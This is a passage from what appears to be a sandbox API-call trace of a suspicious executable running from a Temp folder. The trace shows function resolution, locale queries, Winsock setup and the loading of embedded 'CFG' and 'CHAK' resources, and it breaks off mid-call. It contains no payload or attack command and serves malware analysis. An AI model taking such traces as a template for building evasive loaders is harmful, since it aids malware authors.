(hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e 
[0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0098.011] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0098.011] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0098.011] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0098.011] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0098.011] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0098.011] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0098.011] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15480003909) returned 1 [0098.011] GetTickCount () returned 0x2367a [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15480017501) returned 1 [0098.011] GetTickCount () returned 0x2367a [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, 
wMilliseconds=0x1d5)) [0098.011] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x15082bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x15082bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 
[0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x15082bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x15082bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0098.012] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x15082bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0098.012] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0098.012] GetModuleHandleW (lpModuleName="kernel32.dll") 
returned 0x76910000 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x150f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x15082bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x150f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 
[0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x150f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0098.012] GetThreadLocale () returned 0x409 [0098.012] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0098.012] GetCurrentThreadId () returned 0xbc0 [0098.012] GetCurrentThreadId () returned 0xbc0 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0098.012] GetThreadLocale () returned 0x409 [0098.012] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0098.012] GetThreadLocale () returned 0x409 [0098.012] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0098.012] GetCurrentThreadId () returned 0xbc0 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0098.013] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0098.013] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0098.013] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, 
lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0098.014] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="listen") 
returned 0x7738b001 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0098.017] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0098.022] GetACP () returned 0x4e4 
[0098.022] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0098.022] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.022] GetTickCount () returned 0x2367a [0098.022] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15481087383) returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x44\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x70\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x30\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0098.022] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0098.022] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0098.022] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0098.022] LockResource (hResData=0x50d55c) returned 0x50d55c [0098.022] FreeResource (hResData=0x50d55c) returned 0 [0098.022] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.022] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 